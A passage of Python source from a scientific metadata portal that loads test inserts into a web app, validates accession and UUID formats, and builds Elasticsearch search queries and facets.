# XXX Should use chardet to detect charset for text files here.
return attach
if major == 'image' and minor in ('png', 'jpeg', 'gif', 'tiff'):
# XXX we should just convert our tiffs to pngs
stream.seek(0, 0)
im = Image.open(stream)
im.verify()
if im.format != minor.upper():
msg = "Image file format %r does not match extension for %s"
raise ValueError(msg % (im.format, filename))
attach['width'], attach['height'] = im.size
return attach
raise ValueError("Unknown file type for %s" % filename)
def format_for_attachment(json_data, docsdir):
for field in IS_ATTACHMENT:
if field in json_data:
if isinstance(json_data[field], dict):
pass
elif isinstance(json_data[field], str):
path = find_doc(docsdir, json_data[field])
if not path:
del json_data[field]
                    logger.error('Removing {} from {}, expecting path'.format(field, json_data['uuid']))
else:
json_data[field] = attachment(path)
else:
# malformatted attachment
del json_data[field]
                logger.error('Removing {} from {}, expecting path'.format(field, json_data['uuid']))
return json_data
LOAD_ERROR_MESSAGE = """# ██▓ ▒█████ ▄▄▄ ▓█████▄ ██▓ ███▄ █ ▄████
# ▓██▒ ▒██▒ ██▒▒████▄ ▒██▀ ██▌▓██▒ ██ ▀█ █ ██▒ ▀█▒
# ▒██░ ▒██░ ██▒▒██ ▀█▄ ░██ █▌▒██▒▓██ ▀█ ██▒▒██░▄▄▄░
# ▒██░ ▒██ ██░░██▄▄▄▄██ ░▓█▄ ▌░██░▓██▒ ▐▌██▒░▓█ ██▓
# ░██████▒░ ████▓▒░ ▓█ ▓██▒░▒████▓ ░██░▒██░ ▓██░░▒▓███▀▒
# ░ ▒░▓ ░░ ▒░▒░▒░ ▒▒ ▓▒█░ ▒▒▓ ▒ ░▓ ░ ▒░ ▒ ▒ ░▒ ▒
# ░ ░ ▒ ░ ░ ▒ ▒░ ▒ ▒▒ ░ ░ ▒ ▒ ▒ ░░ ░░ ░ ▒░ ░ ░
# ░ ░ ░ ░ ░ ▒ ░ ▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░
# ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
# ░
# ██▓ ███▄ █ ██████ ▓█████ ██▀███ ▄▄▄█████▓ ██████
# ▓██▒ ██ ▀█ █ ▒██ ▒ ▓█ ▀ ▓██ ▒ ██▒▓ ██▒ ▓▒▒██ ▒
# ▒██▒▓██ ▀█ ██▒░ ▓██▄ ▒███ ▓██ ░▄█ ▒▒ ▓██░ ▒░░ ▓██▄
# ░██░▓██▒ ▐▌██▒ ▒ ██▒▒▓█ ▄ ▒██▀▀█▄ ░ ▓██▓ ░ ▒ ██▒
# ░██░▒██░ ▓██░▒██████▒▒░▒████▒░██▓ ▒██▒ ▒██▒ ░ ▒██████▒▒
# ░▓ ░ ▒░ ▒ ▒ ▒ ▒▓▒ ▒ ░░░ ▒░ ░░ ▒▓ ░▒▓░ ▒ ░░ ▒ ▒▓▒ ▒ ░
# ▒ ░░ ░░ ░ ▒░░ ░▒ ░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ░ ░▒ ░ ░
# ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░
# ░ ░ ░ ░ ░ ░ ░
#
# █████▒▄▄▄ ██▓ ██▓ ▓█████ ▓█████▄
# ▓██ ▒▒████▄ ▓██▒▓██▒ ▓█ ▀ ▒██▀ ██▌
# ▒████ ░▒██ ▀█▄ ▒██▒▒██░ ▒███ ░██ █▌
# ░▓█▒ ░░██▄▄▄▄██ ░██░▒██░ ▒▓█ ▄ ░▓█▄ ▌
# ░▒█░ ▓█ ▓██▒░██░░██████▒░▒████▒░▒████▓
# ▒ ░ ▒▒ ▓▒█░░▓ ░ ▒░▓ ░░░ ▒░ ░ ▒▒▓ ▒
# ░ ▒ ▒▒ ░ ▒ ░░ ░ ▒ ░ ░ ░ ░ ░ ▒ ▒
# ░ ░ ░ ▒ ▒ ░ ░ ░ ░ ░ ░ ░
# ░ ░ ░ ░ ░ ░ ░ ░
# ░ """
def load_all(testapp, inserts, docsdir, overwrite=True, itype=None, from_json=False, patch_only=False):
"""
Wrapper function for load_all_gen, which invokes the generator returned
from that function. Takes all of the same args as load_all_gen, so
please reference that docstring.
This function uses LoadGenWrapper, which will catch a returned value from
the execution of the generator, which is an Exception in the case of
load_all_gen. Return that Exception if encountered, which is consistent
with the functionality of load_all_gen.
"""
gen = LoadGenWrapper(
load_all_gen(testapp, inserts, docsdir, overwrite, itype, from_json, patch_only)
)
# run the generator; don't worry about the output
for _ in gen:
pass
# gen.caught is None for success and an error message on failure
if gen.caught is None:
return None
else:
return Exception(gen.caught)
def load_all_gen(testapp, inserts, docsdir, overwrite=True, itype=None, from_json=False, patch_only=False):
"""
Generator function that yields bytes information about each item POSTed/PATCHed.
Is the base functionality of load_all function.
convert data to store format dictionary (same format expected from from_json=True),
assume main function is to load reasonable number of inserts from a folder
Args:
testapp
inserts : either a folder, file, or a dictionary in the store format
docsdir : attachment folder
overwrite (bool) : if the database contains the item already, skip or patch
itype (list or str): limit selection to certain type/types
from_json (bool) : if set to true, inserts should be dict instead of folder name
patch_only (bool) : if set to true will only do second round patch - no posts
Yields:
Bytes with information on POSTed/PATCHed items
Returns:
None if successful, otherwise a bytes error message
"""
    # TODO: deal with option of file to load (not directory structure)
if docsdir is None:
docsdir = []
# Collect Items
store = {}
if from_json: # we are directly loading json
store = inserts
if not from_json: # we are loading a file
use_itype = False
if os.path.isdir(inserts): # we've specified a directory
if not inserts.endswith('/'):
inserts += '/'
files = [i for i in os.listdir(inserts) if i.endswith('.json')]
elif os.path.isfile(inserts): # we've specified a single file
files = [inserts]
# use the item type if provided AND not a list
# otherwise guess from the filename
use_itype = True if (itype and isinstance(itype, str)) else False
else: # cannot get the file
err_msg = 'Failure loading inserts from %s. Could not find matching file or directory.' % inserts
print(err_msg)
yield str.encode('ERROR: %s\n' % err_msg)
return
# raise StopIteration
# load from the directory/file
for a_file in files:
if use_itype:
item_type = itype
else:
item_type = a_file.split('/')[-1].replace(".json", "")
a_file = inserts + a_file
with open(a_file) as f:
store[item_type] = json.loads(f.read())
# if there is a defined set of items, subtract the rest
if itype:
if isinstance(itype, list):
store = {i: store[i] for i in itype if i in store}
else:
store = {itype: store.get(itype, [])}
# clear empty values
store = {k: v for k, v in store.items() if v is not None}
if not store:
if from_json:
err_msg = 'No items found in input "store" json'
else:
err_msg = 'No items found in %s' % inserts
if itype:
err_msg += ' for item type(s) %s' % itype
print(err_msg)
yield str.encode('ERROR: %s' % err_msg)
return
# raise StopIteration
# order Items
all_types = list(store.keys())
for ref_item in reversed(ORDER):
if ref_item in all_types:
all_types.insert(0, all_types.pop(all_types.index(ref_item)))
# collect schemas
profiles = testapp.get('/profiles/?frame=raw').json
# run step1 - if item does not exist, post with minimal metadata
second_round_items = {}
if not patch_only:
for a_type in all_types:
# this conversion of schema name to object type works for all existing schemas at the moment
obj_type = "".join([i.title() for i in a_type.split('_')])
# minimal schema
schema_info = profiles[obj_type]
req_fields = schema_info.get('required', [])
ids = schema_info.get('identifyingProperties', [])
# some schemas did not include aliases
if 'aliases' not in ids:
ids.append('aliases')
            # file format is required for files, but its usability depends on this field
if a_type in ['file_format', 'experiment_type']:
req_fields.append('valid_item_types')
first_fields = list(set(req_fields+ids))
skip_existing_items = set()
posted = 0
skip_exist = 0
for an_item in store[a_type]:
try:
# 301 because @id is the existing item path, not uuid
testapp.get('/'+an_item['uuid'], status=[200, 301])
exists = True
except Exception:
exists = False
# skip the items that exists
# if overwrite=True, still include them in PATCH round
if exists:
skip_exist += 1
if not overwrite:
skip_existing_items.add(an_item['uuid'])
yield str.encode('SKIP: %s\n' % an_item['uuid'])
else:
post_first = {key: value for (key, value) in an_item.items() if key in first_fields}
post_first = format_for_attachment(post_first, docsdir)
try:
res = testapp.post_json('/'+a_type, post_first)
assert res.status_code == 201
posted += 1
# yield bytes to work with Response.app_iter
yield str.encode('POST: %s\n' % res.json['@graph'][0]['uuid'])
except Exception as e:
print('Posting {} failed. Post body:\n{}\nError Message:{}'
''.format(a_type, str(first_fields), str(e)))
# remove newlines from error, since they mess with generator output
e_str = str(e).replace('\n', '')
yield str.encode('ERROR: %s\n' % e_str)
return
# raise StopIteration
second_round_items[a_type] = [i for i in store[a_type] if i['uuid'] not in skip_existing_items]
logger.info('{} 1st: {} items posted, {} items exists.'.format(a_type, posted, skip_exist))
logger.info('{} 1st: {} items will be patched in second round'
.format(a_type, str(len(second_round_items.get(a_type, [])))))
elif overwrite:
logger.info('Posting round skipped')
for a_type in all_types:
second_round_items[a_type] = [i for i in store[a_type]]
logger.info('{}: {} items will be patched in second round'
.format(a_type, str(len(second_round_items.get(a_type, [])))))
# Round II - patch the rest of the metadata
rnd = ' 2nd' if not patch_only else ''
for a_type in all_types:
patched = 0
obj_type = "".join([i.title() for i in a_type.split('_')])
if not second_round_items[a_type]:
logger.info('{}{}: no items to patch'.format(a_type, rnd))
continue
for an_item in second_round_items[a_type]:
an_item = format_for_attachment(an_item, docsdir)
try:
add_last_modified(an_item, userid=LOADXL_USER_UUID)
res = testapp.patch_json('/'+an_item['uuid'], an_item)
assert res.status_code == 200
patched += 1
# yield bytes to work with Response.app_iter
yield str.encode('PATCH: %s\n' % an_item['uuid'])
except Exception as e:
print('Patching {} failed. Patch body:\n{}\n\nError Message:\n{}'.format(
a_type, str(an_item), str(e)))
e_str = str(e).replace('\n', '')
yield str.encode('ERROR: %s\n' % e_str)
return
# raise StopIteration
        logger.info('{}{}: {} items patched.'.format(a_type, rnd, patched))
# explicit return upon finish
return None
def load_data(app, indir='inserts', docsdir=None, overwrite=False,
use_master_inserts=True):
"""
    This function will take the given inserts folder as input and load its items into the given app's environment.
    args:
        app: the Pyramid/WSGI application to load items into (wrapped in a webtest.TestApp)
        indir (inserts): inserts folder, should be relative to tests/data/
        docsdir (None): folder with attachment documents, relative to tests/data
        overwrite (False): if True, items that already exist are still patched in the second round
        use_master_inserts (True): load master-inserts first, unless indir is itself master-inserts
"""
environ = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': 'TEST',
}
testapp = webtest.TestApp(app, environ)
# load master-inserts by default
if indir != 'master-inserts' and use_master_inserts:
master_inserts = resource_filename('encoded', 'tests/data/master-inserts/')
master_res = load_all(testapp, master_inserts, [])
if master_res: # None if successful
print(LOAD_ERROR_MESSAGE)
logger.error('load_data: failed to load from %s' % master_inserts, error=master_res)
return master_res
if not indir.endswith('/'):
indir += '/'
inserts = resource_filename('encoded', 'tests/data/' + indir)
if docsdir is None:
docsdir = []
else:
if not docsdir.endswith('/'):
docsdir += '/'
docsdir = [resource_filename('encoded', 'tests/data/' + docsdir)]
res = load_all(testapp, inserts, docsdir, overwrite=overwrite)
if res: # None if successful
print(LOAD_ERROR_MESSAGE)
        logger.error('load_data: failed to load from %s' % inserts, error=res)
return res
return None # unnecessary, but makes it more clear that no error was encountered
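# Illustrative usage of load_data (a sketch, not an additional API): loading the standard
# inserts plus attachment documents into a freshly created app could look like
#   err = load_data(app, indir='inserts', docsdir='documents', overwrite=False)
#   assert err is None  # None means every item was posted/patched without error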
def load_test_data(app, overwrite=False):
"""
Load inserts and master-inserts
Returns:
None if successful, otherwise Exception encountered
"""
return load_data(app, docsdir='documents', indir='inserts',
overwrite=overwrite)
def load_local_data(app, overwrite=False):
"""
Load inserts from temporary insert folders, if present and populated
with .json insert files.
If not present, load inserts and master-inserts.
Returns:
None if successful, otherwise Exception encountered
"""
# if we have any json files in temp-local-inserts, use those
chk_dir = resource_filename('encoded', 'tests/data/temp-local-inserts')
use_temp_local = False
    for (dirpath, dirnames, filenames) in os.walk(chk_dir):
        if any(fn.endswith('.json') for fn in filenames):
            use_temp_local = True
            break
if use_temp_local:
return load_data(app, docsdir='documents', indir='temp-local-inserts',
use_master_inserts=False, overwrite=overwrite)
else:
return load_data(app, docsdir='documents', indir='inserts',
overwrite=overwrite)
def load_prod_data(app, overwrite=False):
"""
Load master-inserts
Returns:
None if successful, otherwise Exception encountered
"""
return load_data(app, indir='master-inserts', overwrite=overwrite)
```
#### File: src/encoded/schema_formats.py
```python
import re
from dcicutils.misc_utils import ignored, is_valid_absolute_uri
from jsonschema_serialize_fork import FormatChecker
from pyramid.threadlocal import get_current_request
from .server_defaults import (
ACCESSION_FACTORY,
ACCESSION_PREFIX,
ACCESSION_TEST_PREFIX,
test_accession,
)
ACCESSION_CODES = "BS|ES|EX|FI|FS|IN|SR|WF"
# Codes we allow for testing go here.
ACCESSION_TEST_CODES = "BS|ES|EX|FI|FS|IN|SR|WF"
accession_re = re.compile(r'^%s(%s)[1-9A-Z]{7}$' % (ACCESSION_PREFIX, ACCESSION_CODES))
test_accession_re = re.compile(r'^%s(%s)[0-9]{4}([0-9][0-9][0-9]|[A-Z][A-Z][A-Z])$' % (
ACCESSION_TEST_PREFIX, ACCESSION_TEST_CODES))
uuid_re = re.compile(r'(?i)[{]?(?:[0-9a-f]{4}-?){8}[}]?')
@FormatChecker.cls_checks("uuid")
def is_uuid(instance):
# Python's UUID ignores all dashes, whereas Postgres is more strict
# http://www.postgresql.org/docs/9.2/static/datatype-uuid.html
return bool(uuid_re.match(instance))
def is_accession(instance):
"""Just a pattern checker."""
# Unfortunately we cannot access the accessionType here
return (
accession_re.match(instance) is not None or
test_accession_re.match(instance) is not None
)
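# Illustrative check (a sketch; the real ACCESSION_PREFIX comes from server_defaults and is
# assumed here to be something like '4DN'): with that prefix, is_accession('4DNES1234567')
# would return True ('ES' item code followed by 7 characters from [1-9A-Z]), while a value
# with a lowercase letter or a zero in the tail would not match accession_re.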
@FormatChecker.cls_checks("accession")
def is_accession_for_server(instance):
# Unfortunately we cannot access the accessionType here
if accession_re.match(instance):
return True
request = get_current_request()
if request.registry[ACCESSION_FACTORY] is test_accession:
if test_accession_re.match(instance):
return True
return False
@FormatChecker.cls_checks("gene_name")
def is_gene_name(instance):
"""This SHOULD check a webservice at HGNC/MGI for validation, but for now this just returns True always.."""
ignored(instance)
return True
@FormatChecker.cls_checks("target_label")
def is_target_label(instance):
if is_gene_name(instance):
return True
mod_histone_patt = "^H([234]|2A|2B)[KRT][0-9]+(me|ac|ph)"
fusion_patt = "^(eGFP|HA)-"
oneoff_patts = "^(Control|Methylcytidine|POLR2Aphospho[ST][0-9+])$"
    if not re.match(mod_histone_patt, instance) and \
            not re.match(fusion_patt, instance) and \
            not re.match(oneoff_patts, instance):
return False
return True
@FormatChecker.cls_checks("uri", raises=ValueError)
def is_uri(instance):
return is_valid_absolute_uri(instance)
```
#### File: src/encoded/search.py
```python
import re
import math
import itertools
from functools import reduce
from pyramid.view import view_config
from webob.multidict import MultiDict
from snovault import (
AbstractCollection,
TYPES,
COLLECTIONS
)
from snovault.embed import make_subrequest
from snovault.elasticsearch import ELASTIC_SEARCH
from snovault.elasticsearch.create_mapping import determine_if_is_date_field
from snovault.elasticsearch.indexer_utils import get_namespaced_index
from snovault.resource_views import collection_view_listing_db
from snovault.util import (
find_collection_subtypes,
crawl_schema,
debug_log
)
from snovault.typeinfo import AbstractTypeInfo
from elasticsearch.helpers import scan
from elasticsearch_dsl import Search
from elasticsearch import (
TransportError,
RequestError,
ConnectionTimeout
)
from elasticsearch.exceptions import NotFoundError
from pyramid.httpexceptions import (
HTTPBadRequest,
HTTPFound
)
from urllib.parse import urlencode
from collections import OrderedDict
from copy import deepcopy
import uuid
import structlog
log = structlog.getLogger(__name__)
def includeme(config):
config.add_route('search', '/search{slash:/?}')
config.add_route('browse', '/browse{slash:/?}')
config.scan(__name__)
sanitize_search_string_re = re.compile(r'[\\\+\-\&\|\!\(\)\{\}\[\]\^\~\:\/\\\*\?]')
COMMON_EXCLUDED_URI_PARAMS = [
'frame', 'format', 'limit', 'sort', 'from', 'field',
'mode', 'redirected_from', 'datastore', 'referrer',
'currentAction', 'additional_facet'
]
@view_config(route_name='search', request_method='GET', permission='search')
@debug_log
def search(context, request, search_type=None, return_generator=False, forced_type='Search', custom_aggregations=None):
"""
Search view connects to ElasticSearch and returns the results
"""
types = request.registry[TYPES]
# list of item types used from the query
doc_types = set_doc_types(request, types, search_type)
# calculate @type. Exclude ItemSearchResults unless no other types selected.
search_types = build_search_types(types, doc_types)
search_types.append(forced_type) # the old base search type
# sets request.normalized_params
search_base = normalize_query(request, types, doc_types)
### INITIALIZE RESULT.
result = {
'@context': request.route_path('jsonld_context'),
'@id': '/' + forced_type.lower() + '/' + search_base,
'@type': search_types,
'title': forced_type,
'filters': [],
'facets': [],
'@graph': [],
'notification': '',
'sort': {}
}
principals = request.effective_principals
es = request.registry[ELASTIC_SEARCH]
# Get static section (if applicable) when searching a single item type
# Note: Because we rely on 'source', if the static_section hasn't been indexed
# into Elasticsearch it will not be loaded
if (len(doc_types) == 1) and 'Item' not in doc_types:
search_term = 'search-info-header.' + doc_types[0]
try:
static_section = request.registry['collections']['StaticSection'].get(search_term)
except Exception: # search could fail, NotFoundError does not catch for some reason
static_section = None
if static_section and hasattr(static_section.model, 'source'):
item = static_section.model.source['object']
result['search_header'] = {}
result['search_header']['content'] = item['content']
result['search_header']['title'] = item.get('title', item['display_title'])
result['search_header']['filetype'] = item['filetype']
from_, size = get_pagination(request)
# get desired frame for this search
search_frame = request.normalized_params.get('frame', 'embedded')
### PREPARE SEARCH TERM
prepared_terms = prepare_search_term(request)
schemas = [types[item_type].schema for item_type in doc_types]
# set ES index based on doc_type (one type per index)
# if doc_type is item, search all indexes by setting es_index to None
# If multiple, search all specified
if 'Item' in doc_types:
es_index = get_namespaced_index(request, '*')
else:
es_index = find_index_by_doc_types(request, doc_types, ['Item'])
# establish elasticsearch_dsl class that will perform the search
search = Search(using=es, index=es_index)
# set up clear_filters path
result['clear_filters'] = clear_filters_setup(request, doc_types, forced_type)
### SET TYPE FILTERS
build_type_filters(result, request, doc_types, types)
# get the fields that will be used as source for the search
# currently, supports frame=raw/object but live faceting does not work
# this is okay because the only non-embedded access will be programmatic
source_fields = sorted(list_source_fields(request, doc_types, search_frame))
### GET FILTERED QUERY
# Builds filtered query which supports multiple facet selection
search, string_query = build_query(search, prepared_terms, source_fields)
### Set sort order
search = set_sort_order(request, search, prepared_terms, types, doc_types, result, schemas)
# TODO: implement BOOST here?
### Set filters
search, query_filters = set_filters(request, search, result, principals, doc_types)
### Set starting facets
additional_facets = request.normalized_params.getall('additional_facet')
facets = initialize_facets(request, doc_types, prepared_terms, schemas, additional_facets)
### Adding facets, plus any optional custom aggregations.
### Uses 'size' and 'from_' to conditionally skip (no facets if from > 0; no aggs if size > 0).
search = set_facets(search, facets, query_filters, string_query, request, doc_types, custom_aggregations, size, from_)
### Add preference from session, if available
search_session_id = None
created_new_search_session_id = False
if request.__parent__ is None and not return_generator and size != 'all': # Probably unnecessary, but skip for non-paged, sub-reqs, etc.
search_session_id = request.cookies.get('searchSessionID')
if not search_session_id:
search_session_id = 'SESSION-' + str(uuid.uuid1())
created_new_search_session_id = True
search = search.params(preference=search_session_id)
### Execute the query
if size == 'all':
es_results = execute_search_for_all_results(search)
else:
size_search = search[from_:from_ + size]
es_results = execute_search(size_search)
### Record total number of hits
result['total'] = total = es_results['hits']['total']
result['facets'] = format_facets(es_results, facets, total, additional_facets, search_frame)
result['aggregations'] = format_extra_aggregations(es_results)
# Add batch actions
# TODO: figure out exactly what this does. Provide download URLs?
# Implement later
# result.update(search_result_actions(request, doc_types, es_results))
### Add all link for collections
if size not in (None, 'all') and size < result['total']:
params = [(k, v) for k, v in request.normalized_params.items() if k != 'limit']
params.append(('limit', 'all'))
if context:
result['all'] = '%s?%s' % (request.resource_path(context), urlencode(params))
# add actions (namely 'add')
result['actions'] = get_collection_actions(request, types[doc_types[0]])
if not result['total']:
# http://googlewebmastercentral.blogspot.com/2014/02/faceted-navigation-best-and-5-of-worst.html
request.response.status_code = 404
result['notification'] = 'No results found'
result['@graph'] = []
return result if not return_generator else []
columns = build_table_columns(request, schemas, doc_types)
if columns:
result['columns'] = columns
result['notification'] = 'Success'
### Format results for JSON-LD
graph = format_results(request, es_results['hits']['hits'], search_frame)
if request.__parent__ is not None or return_generator:
if return_generator:
return graph
else:
result['@graph'] = list(graph)
return result
result['@graph'] = list(graph)
if created_new_search_session_id:
request.response.set_cookie('searchSessionID', search_session_id) # Save session ID for re-requests / subsequent pages.
return result
DEFAULT_BROWSE_PARAM_LISTS = {
'type' : ["ExperimentSetReplicate"],
'experimentset_type' : ['replicate'],
# Uncomment if changing back to showing external data: false by default
# 'award.project' : ['4DN']
}
@view_config(route_name='browse', request_method='GET', permission='search')
@debug_log
def browse(context, request, search_type='ExperimentSetReplicate', return_generator=False):
"""
Simply use search results for browse view
Redirect to proper URL w. params if needed
"""
orig_params = request.params
for k,vals in DEFAULT_BROWSE_PARAM_LISTS.items():
if k == 'award.project':
# Could be external or not
continue
if k not in orig_params or orig_params[k] not in vals:
# Redirect to DEFAULT_BROWSE_PARAM_LISTS URL
next_qs = MultiDict()
for k2, v2list in DEFAULT_BROWSE_PARAM_LISTS.items():
for v2 in v2list:
next_qs.add(k2, v2)
            # Preserve other keys that aren't in DEFAULT_BROWSE_PARAM_LISTS
for k2, v2 in orig_params.items():
if k2 not in DEFAULT_BROWSE_PARAM_LISTS:
next_qs.add(k2, v2)
# next_qs.add("redirected_from", str(request.path_qs))
return HTTPFound(
location=str(request.path) + '?' + urlencode(next_qs),
detail="Redirected from " + str(request.path_info)
)
return search(context, request, search_type, return_generator, forced_type='Browse')
@view_config(context=AbstractCollection, permission='list', request_method='GET')
@debug_log
def collection_view(context, request):
"""
Simply use search results for collections views (e.g./biosamples/)
This is a redirect directly to the search page
"""
return search(context, request, context.type_info.name, False, forced_type='Search')
def build_search_types(types, doc_types):
"""
Builds `search_types` based on the requested search `type` in URI param (=> `doc_types`).
:param types: TypesTool from the registry
:param doc_types: Type names we would like to search on.
:return: search_types, or a list of 'SearchResults' type candidates
"""
encompassing_ti_for_all_items = None
for requested_search_type in doc_types: # Handles if only 1 type in here, also.
ti = types[requested_search_type] # 'ti' == 'Type Item'
if encompassing_ti_for_all_items and encompassing_ti_for_all_items.name == "Item":
break # No other higher-level base type
if encompassing_ti_for_all_items is None: # Set initial 'all-encompassing' item type
encompassing_ti_for_all_items = ti
continue
if hasattr(ti, 'base_types'):
# Also handles if same / duplicate requested_search_type encountered (for some reason).
types_list = [requested_search_type] # Self type and base types of requested_search_type
for base_type in ti.base_types:
types_list.append(base_type)
for base_type in types_list:
if encompassing_ti_for_all_items.name == base_type:
break # out of inner loop and continue
if hasattr(encompassing_ti_for_all_items, "base_types") and base_type in encompassing_ti_for_all_items.base_types:
# Will ultimately succeed at when base_type="Item", if not any earlier.
encompassing_ti_for_all_items = types[base_type]
break # out of inner loop and continue
search_types = [ encompassing_ti_for_all_items.name ]
if hasattr(encompassing_ti_for_all_items, "base_types"):
for base_type in encompassing_ti_for_all_items.base_types:
search_types.append(base_type)
if search_types[-1] != "Item":
search_types.append("Item")
return [ t + "SearchResults" for t in search_types ]
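# Illustrative example (the type name and its base types are assumptions for this sketch):
# if doc_types == ['ExperimentSetReplicate'] and that type's base_types were
# ['ExperimentSet', 'Item'], the return value would be
# ['ExperimentSetReplicateSearchResults', 'ExperimentSetSearchResults', 'ItemSearchResults'].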
def get_collection_actions(request, type_info):
collection = request.registry[COLLECTIONS].get(type_info.name)
if hasattr(collection, 'actions'):
return collection.actions(request)
else:
return None
def get_pagination(request):
"""
Fill from_ and size parameters for search if given in the query string
"""
from_ = request.normalized_params.get('from', 0)
size = request.normalized_params.get('limit', 25)
if size in ('all', ''):
size = "all"
else:
try:
size = int(size)
except ValueError:
size = 25
try:
from_ = int(from_)
except ValueError:
            from_ = 0
return from_, size
def get_all_subsequent_results(initial_search_result, search, extra_requests_needed_count, size_increment):
from_ = 0
while extra_requests_needed_count > 0:
#print(str(extra_requests_needed_count) + " requests left to get all results.")
from_ = from_ + size_increment
subsequent_search = search[from_:from_ + size_increment]
subsequent_search_result = execute_search(subsequent_search)
extra_requests_needed_count -= 1
for hit in subsequent_search_result['hits'].get('hits', []):
yield hit
def execute_search_for_all_results(search):
size_increment = 100 # Decrease this to like 5 or 10 to test.
first_search = search[0:size_increment] # get aggregations from here
es_result = execute_search(first_search)
total_results_expected = es_result['hits'].get('total',0)
extra_requests_needed_count = int(math.ceil(total_results_expected / size_increment)) - 1 # Decrease by 1 (first es_result already happened)
if extra_requests_needed_count > 0:
es_result['hits']['hits'] = itertools.chain(es_result['hits']['hits'], get_all_subsequent_results(es_result, search, extra_requests_needed_count, size_increment))
return es_result
def normalize_query(request, types, doc_types):
"""
Normalize the query by calculating and setting request.normalized_params
(a webob MultiDict) that is derived from custom query rules and also
the list of doc_types specified by set_doc_types(). The normalize_param
helper function finds field_schema for each query parameter and enforces
a set of rules (see below). If the query item types differ from doc_types,
override with doc_types
Args:
request: the current Request
types: registry[TYPES]
doc_types (list): item_types to use for the search
Returns:
string: query string built from normalized params
"""
def normalize_param(key, val):
"""
Process each key/val in the original query param. As part of this,
obtain the field schema for each parameter.
Current rules:
- for 'type', get name from types (from the registry)
- append '.display_title' to any terminal linkTo query field
- append '.display_title' to sorts on fields
"""
# type param is a special case. use the name from TypeInfo
if key == 'type' and val in types:
return (key, types[val].name)
# if key is sort, pass val as the key to this function
# if it appends display title we know its a linkTo and
# should be treated as such
if key == 'sort':
# do not use '-' if present
sort_val = val[1:] if val.startswith('-') else val
new_val, _ = normalize_param(sort_val, None)
if new_val != sort_val:
val = val.replace(sort_val, new_val)
return (key, val)
# find schema for field parameter and drill down into arrays/subobjects
field_schema = schema_for_field(key, request, doc_types)
while field_schema and ('items' in field_schema or 'properties' in field_schema):
try:
field_schema = field_schema['items']
except KeyError:
pass
try:
field_schema = field_schema['properties']
except KeyError:
pass
if field_schema and 'linkTo' in field_schema:
# add display_title to terminal linkTo query fields
if key.endswith('!'): # handle NOT
return (key[:-1] + '.display_title!', val)
return (key + '.display_title', val)
else:
return (key, val)
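    # Illustrative behavior of normalize_param (field names are assumptions for this sketch),
    # assuming 'lab' is a linkTo field on the searched type:
    #   normalize_param('lab', '/labs/some-lab/')  -> ('lab.display_title', '/labs/some-lab/')
    #   normalize_param('lab!', 'x')               -> ('lab.display_title!', 'x')
    #   normalize_param('sort', '-lab')            -> ('sort', '-lab.display_title')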
normalized_params = (
normalize_param(k, v)
for k, v in request.params.items()
)
# use a MultiDict to emulate request.params
normalized_params = MultiDict(normalized_params)
# overwrite 'type' if not equal to doc_types
if set(normalized_params.getall('type')) != set(doc_types):
if 'type' in normalized_params:
del normalized_params['type']
for dtype in doc_types:
normalized_params.add('type', dtype)
# add the normalized params to the request
# these will be used in place of request.params for the rest of search
setattr(request, 'normalized_params', normalized_params)
# the query string of the normalized search
qs = '?' + urlencode([
(k.encode('utf-8'), v.encode('utf-8'))
for k, v in request.normalized_params.items()
])
return qs
def clear_filters_setup(request, doc_types, forced_type):
'''
Clear Filters URI path
Make a URI path that clears all non-datatype filters
and leaves in `q` (search query) params, if present.
Also preserves currentAction=selection (or multiselect), if is set.
Returns:
A URL path
'''
    search_query_specs = request.normalized_params.getall('q')
    search_query_url = urlencode([("q", search_query) for search_query in search_query_specs])
# types_url will always be present (always >=1 doc_type)
types_url = urlencode([("type", typ) for typ in doc_types])
current_action = request.normalized_params.get('currentAction')
clear_qs = types_url or ''
    if search_query_url:
        clear_qs += '&' + search_query_url
if current_action == 'selection' or current_action == 'multiselect':
        clear_qs += ('&currentAction=' + current_action)
current_search_sort = request.normalized_params.getall('sort')
current_search_sort_url = urlencode([("sort", s) for s in current_search_sort])
if current_search_sort_url:
clear_qs += '&' + current_search_sort_url
return request.route_path(forced_type.lower(), slash='/') + (('?' + clear_qs) if clear_qs else '')
def build_type_filters(result, request, doc_types, types):
"""
Set the type filters for the search. If no doc_types, default to Item
"""
if not doc_types:
doc_types = ['Item']
else:
for item_type in doc_types:
ti = types[item_type]
qs = urlencode([
(k.encode('utf-8'), v.encode('utf-8'))
for k, v in request.normalized_params.items() if not (k == 'type' and types.all.get('Item' if v == '*' else v) is ti)
])
result['filters'].append({
'field': 'type',
'term': ti.name,
'remove': '{}?{}'.format(request.path, qs)
})
def prepare_search_term(request):
"""
Prepares search terms by making a dictionary where the keys are fields
and the values are arrays of query strings
Ignore certain keywords, such as type, format, and field
"""
prepared_terms = {}
for field, val in request.normalized_params.items():
if field.startswith('validation_errors') or field.startswith('aggregated_items') or \
field == 'additional_facet':
continue
elif field == 'q': # searched string has field 'q'
# people shouldn't provide multiple queries, but if they do,
# combine them with AND logic
if 'q' in prepared_terms:
join_list = [prepared_terms['q'], val]
prepared_terms['q'] = ' AND '.join(join_list)
else:
prepared_terms['q'] = val
elif field not in COMMON_EXCLUDED_URI_PARAMS + ['type']:
if 'embedded.' + field not in prepared_terms.keys():
prepared_terms['embedded.' + field] = []
prepared_terms['embedded.' + field].append(val)
return prepared_terms
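# Illustrative example (param names are assumptions for this sketch): a request whose
# normalized params are {'type': 'Experiment', 'q': 'nucleosome', 'lab.display_title': 'Some Lab'}
# would yield {'q': 'nucleosome', 'embedded.lab.display_title': ['Some Lab']};
# 'type' and the other excluded params are never added to prepared_terms.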
def set_doc_types(request, types, search_type):
"""
Set the type of documents resulting from the search; order and check for
invalid types as well. If a forced search_type is enforced, use that;
otherwise, set types from the query params. Default to Item if none set.
Args:
request: the current Request
types: registry[TYPES]
search_type (str): forced search item type
Returns:
list: the string item types to use for the search
Raises:
HTTPBadRequest: if an invalid item type is supplied
"""
doc_types = []
if search_type is None:
doc_types = request.params.getall('type')
if '*' in doc_types:
doc_types = ['Item']
else:
doc_types = [search_type]
# Normalize to item_type
try:
doc_types = sorted({types[name].name for name in doc_types})
except KeyError:
# Check for invalid types
bad_types = [t for t in doc_types if t not in types]
msg = "Invalid type: {}".format(', '.join(bad_types))
raise HTTPBadRequest(explanation=msg)
